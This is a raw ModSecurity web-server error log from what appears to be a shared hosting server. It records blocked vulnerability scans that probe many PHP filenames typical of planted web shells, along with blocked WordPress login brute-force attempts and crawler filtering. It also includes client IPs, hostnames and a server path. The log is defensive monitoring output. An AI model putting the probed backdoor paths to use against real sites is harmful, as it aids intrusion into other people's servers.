[Tue May 26 13:16:24.959802 2026] [security2:error] [pid 501489:tid 501683] [client 4.201.75.230:34691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahVP0GkFNZ9cRlz80IjGQAAAAMQ"]
[Tue May 26 13:16:25.032362 2026] [security2:error] [pid 501489:tid 501654] [client 74.7.230.5:44754] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.keyamind.com.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVP0WkFNZ9cRlz80IjGQgAAp0s"]
[Tue May 26 13:16:27.072067 2026] [security2:error] [pid 501489:tid 501639] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP0mkFNZ9cRlz80IjGdAAAAJk"]
[Tue May 26 13:16:27.443692 2026] [security2:error] [pid 501489:tid 501695] [client 14.224.179.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP02kFNZ9cRlz80IjGfQAAANA"]
[Tue May 26 13:16:28.800933 2026] [security2:error] [pid 501489:tid 501678] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP1GkFNZ9cRlz80IjGogAAAL8"]
[Tue May 26 13:16:31.606659 2026] [security2:error] [pid 501489:tid 501641] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP12kFNZ9cRlz80IjG1wAAAJs"]
[Tue May 26 13:16:31.662325 2026] [security2:error] [pid 501489:tid 501743] [client 4.201.75.230:34710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahVP12kFNZ9cRlz80IjG3QAAAPw"]
[Tue May 26 13:16:33.671527 2026] [security2:error] [pid 501489:tid 501643] [client 128.140.41.193:17600] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVP2WkFNZ9cRlz80IjHDgAAAJ0"], referer: https://thegoodsporting.com
[Tue May 26 13:16:33.821992 2026] [security2:error] [pid 501489:tid 501672] [client 4.201.75.230:34726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-admin/user/index.php"] [unique_id "ahVP2WkFNZ9cRlz80IjHGAAAALk"]
[Tue May 26 13:16:34.288908 2026] [security2:error] [pid 501489:tid 501684] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP2WkFNZ9cRlz80IjHGQAAAMU"]
[Tue May 26 13:16:35.045006 2026] [security2:error] [pid 501489:tid 501652] [client 4.201.75.230:34725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-conf.php"] [unique_id "ahVP22kFNZ9cRlz80IjHNgAAAKU"]
[Tue May 26 13:16:37.070081 2026] [security2:error] [pid 501489:tid 501684] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP3GkFNZ9cRlz80IjHYwAAAMU"]
[Tue May 26 13:16:37.345465 2026] [security2:error] [pid 501489:tid 501732] [client 4.201.75.230:34692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVP3WkFNZ9cRlz80IjHaAAAAPI"]
[Tue May 26 13:16:38.165728 2026] [security2:error] [pid 501489:tid 501681] [client 43.173.180.170:35092] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVP3GkFNZ9cRlz80IjHZwAAAMI"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/8b5d38584f680a90-8b5d38584f680a90-combined.css
[Tue May 26 13:16:39.215331 2026] [security2:error] [pid 501489:tid 501749] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP3mkFNZ9cRlz80IjHmwAAAQI"]
[Tue May 26 13:16:40.611872 2026] [security2:error] [pid 501489:tid 501673] [client 107.152.46.252:55137] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVP32kFNZ9cRlz80IjHugAAALo"], referer: https://www.cagmedya.com/
[Tue May 26 13:16:41.389768 2026] [security2:error] [pid 501489:tid 501669] [client 43.173.179.141:50982] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVP4GkFNZ9cRlz80IjHuwAAALY"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/8b5d38584f680a90-8b5d38584f680a90-combined.css
[Tue May 26 13:16:41.939458 2026] [security2:error] [pid 501489:tid 501676] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP4WkFNZ9cRlz80IjH6AAAAL0"]
[Tue May 26 13:16:41.948531 2026] [security2:error] [pid 501489:tid 501640] [client 43.172.198.30:49700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVP4GkFNZ9cRlz80IjHwAAAAJo"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/8b5d38584f680a90-8b5d38584f680a90-combined.css
[Tue May 26 13:16:42.056442 2026] [security2:error] [pid 501489:tid 501518] [remote 103.11.102.106:36966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVP4WkFNZ9cRlz80IjH8QAAxBw"]
[Tue May 26 13:16:42.373732 2026] [security2:error] [pid 501489:tid 501741] [client 4.201.75.230:34728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/abc.php"] [unique_id "ahVP4mkFNZ9cRlz80IjH_QAAAPo"]
[Tue May 26 13:16:43.674357 2026] [security2:error] [pid 501489:tid 501523] [remote 103.11.102.106:39484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVP42kFNZ9cRlz80IjILAAA9yE"]
[Tue May 26 13:16:44.079273 2026] [security2:error] [pid 501489:tid 501700] [client 43.173.178.85:46268] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVP4mkFNZ9cRlz80IjIFwAAANU"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/8b5d38584f680a90-8b5d38584f680a90-combined.css
[Tue May 26 13:16:44.131119 2026] [security2:error] [pid 501489:tid 501695] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP42kFNZ9cRlz80IjIMgAAANA"]
[Tue May 26 13:16:44.230852 2026] [security2:error] [pid 501489:tid 501535] [remote 54.36.102.244:47996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVP5GkFNZ9cRlz80IjIPQAAii0"]
[Tue May 26 13:16:44.609211 2026] [security2:error] [pid 501489:tid 501694] [client 43.172.194.236:47894] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVP42kFNZ9cRlz80IjIHwAAAM8"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/8b5d38584f680a90-8b5d38584f680a90-combined.css
[Tue May 26 13:16:46.133705 2026] [security2:error] [pid 501489:tid 501713] [client 4.201.75.230:34721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahVP5mkFNZ9cRlz80IjIkgAAAOI"]
[Tue May 26 13:16:46.578530 2026] [security2:error] [pid 501489:tid 501737] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP5mkFNZ9cRlz80IjIkwAAAPY"]
[Tue May 26 13:16:46.723314 2026] [security2:error] [pid 501489:tid 501714] [client 43.173.181.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVP5WkFNZ9cRlz80IjIfAAAAOM"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/8b5d38584f680a90-8b5d38584f680a90-combined.css
[Tue May 26 13:16:47.247213 2026] [security2:error] [pid 501489:tid 501670] [client 43.173.175.163:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVP5WkFNZ9cRlz80IjIhgAAALc"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/8b5d38584f680a90-8b5d38584f680a90-combined.css
[Tue May 26 13:16:47.554050 2026] [security2:error] [pid 501489:tid 501683] [client 4.201.75.230:34714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/as.php"] [unique_id "ahVP52kFNZ9cRlz80IjIvQAAAMQ"]
[Tue May 26 13:16:48.406734 2026] [security2:error] [pid 501489:tid 501627] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP52kFNZ9cRlz80IjIzAAAAI0"]
[Tue May 26 13:16:48.473121 2026] [security2:error] [pid 501489:tid 501560] [remote 74.7.241.58:46024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVP6GkFNZ9cRlz80IjI2gAAvEY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:16:48.756664 2026] [security2:error] [pid 501489:tid 501643] [client 4.201.75.230:34711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-trackback.php"] [unique_id "ahVP6GkFNZ9cRlz80IjI5AAAAJ0"]
[Tue May 26 13:16:51.368339 2026] [security2:error] [pid 501489:tid 501748] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP6mkFNZ9cRlz80IjJLQAAAQE"]
[Tue May 26 13:16:51.918135 2026] [security2:error] [pid 501489:tid 501704] [client 4.201.75.230:5680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVP62kFNZ9cRlz80IjJQgAAANk"]
[Tue May 26 13:16:53.330153 2026] [security2:error] [pid 501489:tid 501698] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP7GkFNZ9cRlz80IjJWgAAANM"]
[Tue May 26 13:16:53.656094 2026] [security2:error] [pid 501489:tid 501677] [client 4.201.75.230:40320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVP7WkFNZ9cRlz80IjJgwAAAL4"]
[Tue May 26 13:16:53.728597 2026] [security2:error] [pid 501489:tid 501706] [client 14.160.177.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP7WkFNZ9cRlz80IjJbwAAANs"]
[Tue May 26 13:16:54.296095 2026] [security2:error] [pid 501489:tid 501623] [client 4.201.75.230:34719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVP7mkFNZ9cRlz80IjJmQAAAIk"]
[Tue May 26 13:16:54.486696 2026] [security2:error] [pid 501489:tid 501655] [client 114.119.152.54:56809] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/gaziantep-web-tasarim/"] [unique_id "ahVP7mkFNZ9cRlz80IjJoAAAAKg"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 13:16:55.118154 2026] [security2:error] [pid 501489:tid 501643] [client 62.244.225.226:38080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVP7mkFNZ9cRlz80IjJsAAAAJ0"]
[Tue May 26 13:16:55.726336 2026] [security2:error] [pid 501489:tid 501723] [client 4.201.75.230:34723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahVP72kFNZ9cRlz80IjJyQAAAOs"]
[Tue May 26 13:16:55.870588 2026] [security2:error] [pid 501489:tid 501642] [client 4.201.75.230:5655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVP72kFNZ9cRlz80IjJywAAAJw"]
[Tue May 26 13:16:56.344335 2026] [security2:error] [pid 501489:tid 501623] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP72kFNZ9cRlz80IjJ0AAAAIk"]
[Tue May 26 13:16:57.911506 2026] [security2:error] [pid 501489:tid 501711] [client 4.201.75.230:5476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahVP8WkFNZ9cRlz80IjKBwAAAOA"]
[Tue May 26 13:16:58.860551 2026] [security2:error] [pid 501489:tid 501635] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP8mkFNZ9cRlz80IjKGQAAAJU"]
[Tue May 26 13:16:59.717947 2026] [security2:error] [pid 501489:tid 501629] [client 157.55.39.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVP82kFNZ9cRlz80IjKRAAAAI8"]
[Tue May 26 13:16:59.866717 2026] [security2:error] [pid 501489:tid 501603] [remote 82.196.25.136:33362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVP82kFNZ9cRlz80IjKRwAAsHE"]
[Tue May 26 13:16:59.995131 2026] [security2:error] [pid 501489:tid 501740] [client 4.201.75.230:34689] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVP82kFNZ9cRlz80IjKTgAAAPk"]
[Tue May 26 13:17:01.233644 2026] [security2:error] [pid 501489:tid 501705] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP9GkFNZ9cRlz80IjKZAAAANo"]
[Tue May 26 13:17:02.976714 2026] [security2:error] [pid 501489:tid 501699] [client 4.201.75.230:26384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahVP9mkFNZ9cRlz80IjKpgAAANQ"]
[Tue May 26 13:17:03.785104 2026] [security2:error] [pid 501489:tid 501620] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP92kFNZ9cRlz80IjKsAAAAIY"]
[Tue May 26 13:17:03.788710 2026] [security2:error] [pid 501489:tid 501688] [client 4.201.75.230:5271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVP92kFNZ9cRlz80IjKuAAAAMk"]
[Tue May 26 13:17:04.869248 2026] [security2:error] [pid 501489:tid 501497] [remote 95.211.96.182:48868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.96.211.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVP-GkFNZ9cRlz80IjKygAAywc"]
[Tue May 26 13:17:05.078048 2026] [security2:error] [pid 501489:tid 501656] [client 4.201.75.230:5269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVP-WkFNZ9cRlz80IjK1gAAAKk"]
[Tue May 26 13:17:05.818400 2026] [security2:error] [pid 501489:tid 501631] [client 4.201.75.230:34716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/xmlrpc.php"] [unique_id "ahVP-WkFNZ9cRlz80IjK4AAAAJE"]
[Tue May 26 13:17:06.229562 2026] [security2:error] [pid 501489:tid 501701] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP-WkFNZ9cRlz80IjK5wAAANY"]
[Tue May 26 13:17:07.078549 2026] [security2:error] [pid 501489:tid 501693] [client 4.201.75.230:34712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahVP-2kFNZ9cRlz80IjLDAAAAM4"]
[Tue May 26 13:17:07.772229 2026] [security2:error] [pid 501489:tid 501724] [client 4.201.75.230:5264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVP-2kFNZ9cRlz80IjLHQAAAOw"]
